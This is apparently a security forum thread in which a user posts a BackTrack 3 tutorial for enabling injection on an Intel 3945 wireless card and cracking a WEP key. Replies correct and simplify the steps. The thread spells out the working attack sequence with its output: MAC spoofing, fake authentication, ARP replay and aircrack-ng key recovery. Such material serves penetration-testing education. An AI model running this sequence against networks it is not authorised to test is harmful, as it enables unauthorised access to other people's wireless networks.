Intel 3945 Injection & Fixes For Aircrack-ng BT3 Beta

[secure_it]

PLEASE USE A COLOR EVERY ONE CAN READ. Not every one uses the black razor style. Some of us like the default style which is mainly white. Thank you for your cooperation. ---Pureh@te



remove old aircrack-ng 0.9 or whatever version you have
bt ~ #make uninstall

download
bt ~ #svn co http://trac.aircrack-ng.org/svn/branch/1.0-dev/ aircrack-ng
bt ~ #cd aircrack-ng
bt aircrack-ng #gmake SQLITE=true
bt aircrack-ng #gmake SQLITE=true install

bt ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wmaster0 no wireless extensions.

wlan0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Managed Channel:0 Access Point: Not-Associated
Tx-Power=0 dBm
Retry min limit:7 RTS thr:off Fragment thr=2346 B
Encryption key:off
Power Management:off
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0


bt ~ #modprobe -r iwl3945
bt ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

bt ~ #modprobe ipwraw

bt ~ # iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

wifi0 unassociated ESSID:off/any
Mode:Monitor Channel=1 Bit Rate=54 Mb/s

rtap0 no wireless extensions.

here you are.you have enabled your intel3945 NIC to do discovery/injetion and penetration testing

bt ~ #ifconfig wifi0 down
bt ~ # macchanger --mac 00:10:20:30:40:50 wifi0
Current MAC: 00:ab:ab:ab:ab:ab (unknown)
Faked MAC: 00:10:20:30:40:50 (Welch Allyn, Data Collection)
mac spoofing for security. upto u :)
bt ~ #ifconfig wifi0 up
bt ~ # ifconfig wifi0
wifi0 Link encap:UNSPEC HWaddr 00-10-20-30-40-50-D8-54-00-00-00-00-00-00-00-00
UP BROADCAST NOTRAILERS PROMISC ALLMULTI MTU:2346 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:6 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:108 (108.0 b)
Interrupt:19 Base address:0x6000 Memory:f4300000-f4300fff
bt ~ # airmon-ng start wifi0

Interface Chipset Driver

wifi0 Centrino a/b/g ipwraw-ng (monitor mode enabled)


bt ~ #airodump-ng wifi0

get the SSID of your network AP
and stop using ctrl+c because we dont want to unnecessariliy capture other ap's data.

bt ~ # airodump-ng -c 11 -w pentest --bssid 00:08:5C:7B:9E:B5 wifi0
(let the airodump window keep running to capture enough packets)

CH 11 ][ Elapsed: 9 mins ][ 2008-02-20 13:43

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:08:5C:7B:9E:B5 0 100 4537 54723 0 11 54 WEP WEP OPN Narayan-sivenara

BSSID STATION PWR Rate Lost Packets Probes

00:08:5C:7B:9E:B5 00:10:20:30:40:50 0 0- 0 0 73393

bt ~ # aireplay-ng -1 0 -a 00:08:5C:7B:9E:B5 -h 00:10:20:30:40:50 wifi0
13:35:08 Waiting for beacon frame (BSSID: 00:08:5C:7B:9E:B5) on channel 11

13:35:08 Sending Authentication Request (Open System) [ACK]
13:35:08 Authentication successful
13:35:08 Sending Association Request [ACK]
13:35:08 Association successful :-)

bt ~ # aireplay-ng -3 -b 00:08:5C:7B:9E:B5 -h 00:10:20:30:40:50 wifi0
13:35:56 Waiting for beacon frame (BSSID: 00:08:5C:7B:9E:B5) on channel 11
Saving ARP requests in replay_arp-0220-133556.cap
You should also start airodump-ng to capture replies.
Read 129275 packets (got 54575 ARP requests and 70947 ACKs), sent 83561 packets...(499 pps)

bt ~ # aircrack-ng -n 64 --bssid 00:08:5C:7B:9E:B5 pentest-01.cap
Opening pentest-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 54722 ivs.
KEY FOUND! [ 98:45:00:88:57 ]
Decrypted correctly: 100%

I hope this tutorial will help all the people having Intel3945 NIC for penetration testing and vulnerability test.thanks a lot to exploitz for making such wonderful tutorials and videos.if any mistake you found please let me know I will correct it.I am happy to be a proud member of this so full of knowledge forum with lots of tutorial.
Tested On:
My laptop Specification
compaq presario v3000(v3607TU)
Dual Core 1.6 GHz With 1 MB L2 Cache
Intel 956GM Chipset
120 GB HDD
4 GB Transcend DDR2 667 MHz RAM
Intel X3100 PCI-E
Running OS.Backtrack 3 Beta Dual Boot With Windows Vista
Vmware on Vista Running OS:Windows Server 2003 Enterprise Edition With IIS 6.0/ADS,Windows Xp Professional with SP3 latest updated,Sun Solaris 10,BackTrack 3

My Computer Specification
Pentium 4 1.7 GHz PGA 478 socket
Intel 850 MB orignal MB
1 GB RDRAM PC800 Samsung
200 GB HDD IDE Segate Baracuda 7200 RPM 160 GB + Segate Baracuda 5400 RPM 40 GB
Asus Geforce 2 GTS 128 MB AGP 4x
Running OS Windows XP Pro With SP3 ,Dual Boot With BT 3 Beta karnel 2.6.21.5

Here are proofs

[purehate]

secure_it, I'm a little unclear as to why you wrote this. Its not that we as a community don't appreciate the input however there is a lot of unnecessary steps in your tutorial.

Backtrack 3 beta already has the drivers for the ipw3495. The drivers are located in the /usr/src/drivers folder. The illwifi drivers are for connecting and surfing the net and the ipwraw drivers are for injection. There was a small issue with the kde menu links which I fixed the first day and posted to the wiki. The menu fixes will load and unload the drivers perfectly.

Another important fact about these drivers you forgot to mention is that you must always UNLOAD one before loading the other one.

I'm not picking on you at all and I appreciate the work you must have spent on this I'm just pointing out that most of this stuff is included in backtrack 3 beta already and is ready to go.

So if any one is using this tutorial they can make the menu fixes and then start at the airodump-ng part.

I will however move this to the tutorial section.

[imported_wyze]

Also (deja vu) I just mentioned to someone else in another post about this issue:

http://forums.remote-exploit.org/sho...ght=ipw3945.sh

[secure_it]

thanks for your valuable opinions pureh@te.my intention was just to clear the doubts about "can intel 3945 inject packets" that's it.because I found many users were wandering about aircrack-ng freezing while using intel 3945 drivers or something like confusion about intel 3945 able to inject or monitor with airodump.So I thought to make things clear and collected at single place to prove intel 3945 can inject using ipwraw drivers and I have used modprobe to load/unload drivers.anyways thanks for all what you have mention regarding fixes.I am glad to say that I am contributing something to this forum and to take help and giving help to newbies there.thanks once again to all senior member outta there.



Secure_it
M.Sc(IT),DOEACC A Level,MCSE:Security,Comptia Security+,Cisco CCNA,EC CEH
Next Target Offensive Security 101v2 & Wifoo.

[Evil Monkey]

hey Good lol this will help few people and 1 more thing ,i think that is 64 bit WEP
key not 128 what u got KEY FOUND! [ 98:45:00:88:57 ]


Evil Monkey
(You are entering the lands of packets, brute force and misuse of trust.
This is a dark land. Full of problems and choices. Be carefull when you use your knowledge. Be also carefull with your tools and weapons. Never underestimate your enemy. )

[_JMF_]

secure_it
you told me to come here check your post, so here are my comments:

There is a new ipwraw-ng version available... You should have referred to it instead of 2.0.0
The newest file in ASPj's page is now ipwraw-ng-2.3.4-04022008.tar.bz2
The best would be to go to /usr/src/drivers and put the new version there, on top of the old one.

Some unnecessary steps:

• bt ~ # depmod -ae (the driver's "make install" already does it)
• remove old aircrack-ng 0.9 or whatever version you have (I think the executable files have the same name as old ones, so you just need to install the new version over the old)
• bt aircrack-ng #gmake SQLITE=true (is this really necessary?...)
• Restart the system (is it necessary? if you're using a live CD this will make you lose what you've done until now...)

All those iwconfig aren't needed also, but it's nice to have them there. It provides useful info to the target viewers of your post so they can know if they're doing things right at each step
And if they do the things right, they'll be happy and won't come here to make questions
Nice to see a complete guide like this, showing that the card works, and how.

[imported_sardinemaster]

very nice, secure_it... defenitly one of the best, most complete and understandable tutorials i've seen around.

Thanks.

[secure_it]

thanks dude.its all because of tutorials/posts around in remote exploit,wifiway,aircrack-ng forums and google & specially the tutorials by Xploitz

[imported_sardinemaster]

yeah, but you've put it into one comprehensive tutorial. by the way I didnt quite understand if all the commands are correct or not? so in theory if I did that all, I should be able to inject?

(purehate said something about unmounting, did you put those in?)

Thanks.

[secure_it]

things will work absolutely fine if you follow this tutorial then you will be able to inject packet on your ap and can check how much insecure is WEP to use today.well I have done all things correctly and by mounting and dismounting drivers is modprobing them.check that.thanks for watching and please let me know things are working fine at your end too.if any conflict post it here and if success then please let me know.



Secure_it